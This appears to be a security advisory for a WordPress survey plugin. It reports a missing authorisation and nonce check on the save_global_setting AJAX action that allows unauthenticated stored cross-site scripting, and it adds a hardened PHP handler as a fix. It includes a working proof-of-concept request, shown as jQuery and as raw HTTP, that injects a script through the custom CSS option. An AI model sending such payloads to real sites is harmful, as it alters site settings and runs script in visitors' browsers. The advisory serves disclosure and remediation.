The plugin has neither an authorisation check nor a CSRF (nonce) check on the save_global_setting AJAX action, so unauthenticated users can edit surveys and modify the plugin's global settings. Because the settings are stored without sanitisation and output without escaping, this also leads to Stored Cross-Site Scripting: a payload placed in the custom CSS option breaks out of the <style> element it is rendered in and is executed in the browser of any user viewing any survey.
jQuery.post(
  "https://example.com/wp-admin/admin-ajax.php?action=save_global_setting",
  { ps_global_options: { ps_options_custom_css: "body{background-color:blue !important;}</style><script>alert(/XSS/)</script><style>" } }
)

The same request as seen on the wire:

POST /wp-admin/admin-ajax.php?action=save_global_setting HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 160
Connection: close

ps_global_options%5Bps_options_custom_css%5D=body%7Bbackground-color%3Ablue+!important%3B%7D%3C%2Fstyle%3E%3Cscript%3Ealert(%2FXSS%2F)%3C%2Fscript%3E%3Cstyle%3E

Once the option is saved, every post containing a survey is rendered with a blue background and the injected script runs (the alert fires) for anyone viewing it. Note that the request carries no nonce and no authentication cookie at all.
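The following is an added example, not the plugin's own code, showing how a WordPress admin-ajax handler for this kind of action should be written: registered for logged-in users only, protected by a nonce, gated on a capability, and with the custom CSS sanitised to match the <style> context it is later printed into. Function names (ps_save_global_setting, ps_enqueue_settings_script, ps_print_custom_css), the option keys, the nonce action string and the settings page slug are assumptions for illustration; only the action name save_global_setting comes from the advisory.

```php
<?php
/**
 * Added example (not the plugin's code): hardened admin-ajax handler.
 * All ps_* names, option keys and the page slug are assumed for illustration.
 */

// 1. Register for logged-in users only. The vulnerable pattern is to also hook
//    wp_ajax_nopriv_save_global_setting, which lets anonymous visitors reach
//    the same code path. Do not register the nopriv variant for this action.
add_action( 'wp_ajax_save_global_setting', 'ps_save_global_setting' );

function ps_save_global_setting() {
    // 2. CSRF: require a nonce bound to this action. check_ajax_referer() ends
    //    the request with a -1 response if the 'nonce' field is missing/stale.
    check_ajax_referer( 'ps_global_settings', 'nonce' );

    // 3. Authorisation: being logged in is not enough; only administrators
    //    may change site-wide settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    $input = ( isset( $_POST['ps_global_options'] ) && is_array( $_POST['ps_global_options'] ) )
        ? wp_unslash( $_POST['ps_global_options'] )
        : array();

    // 4. Sanitise each option according to where it will be used. The custom
    //    CSS is emitted inside a <style> element, so the dangerous input is a
    //    closing tag. Strip all tags (as core does for its own Additional CSS)
    //    and reject anything that still contains '<'.
    $css = isset( $input['ps_options_custom_css'] ) ? (string) $input['ps_options_custom_css'] : '';
    $css = wp_strip_all_tags( $css );
    if ( false !== strpos( $css, '<' ) ) {
        wp_send_json_error( 'invalid custom CSS', 400 );
    }

    $clean = array(
        'ps_options_custom_css' => $css,
    );

    update_option( 'ps_global_options', $clean );
    wp_send_json_success( $clean );
}

// 5. The settings page that issues the AJAX call must receive the nonce.
//    Generate it server-side and hand it to the script that posts to
//    admin-ajax.php; the client then sends it as the 'nonce' POST field.
function ps_enqueue_settings_script( $hook ) {
    if ( 'settings_page_ps-survey' !== $hook ) { // assumed settings page slug
        return;
    }
    wp_enqueue_script( 'ps-settings', plugins_url( 'settings.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'ps-settings', 'psSettings', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'ps_global_settings' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'ps_enqueue_settings_script' );

// 6. Output: even though the stored value was sanitised, escape again at the
//    point of use so an older or tampered option value cannot break out of
//    the <style> element.
function ps_print_custom_css() {
    $opts = get_option( 'ps_global_options', array() );
    $css  = isset( $opts['ps_options_custom_css'] ) ? (string) $opts['ps_options_custom_css'] : '';
    if ( '' === $css ) {
        return;
    }
    echo '<style id="ps-custom-css">' . wp_strip_all_tags( $css ) . "</style>\n";
}
add_action( 'wp_head', 'ps_print_custom_css' );
```

With this in place the advisory's PoC fails at three independent points: the request from an anonymous visitor never reaches the handler (no nopriv hook), a request without a valid nonce is rejected before any input is read, and a payload that does get past both checks has its </style> and <script> tags stripped before storage and again before output. The legitimate client call becomes jQuery.post(psSettings.ajaxUrl, { action: "save_global_setting", nonce: psSettings.nonce, ps_global_options: { ps_options_custom_css: "..." } }).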
apple502j
apple502j
Yes
2021-10-05 (about 1 year ago)
2021-12-29 (about 1 year ago)
2022-04-13 (about 9 months ago)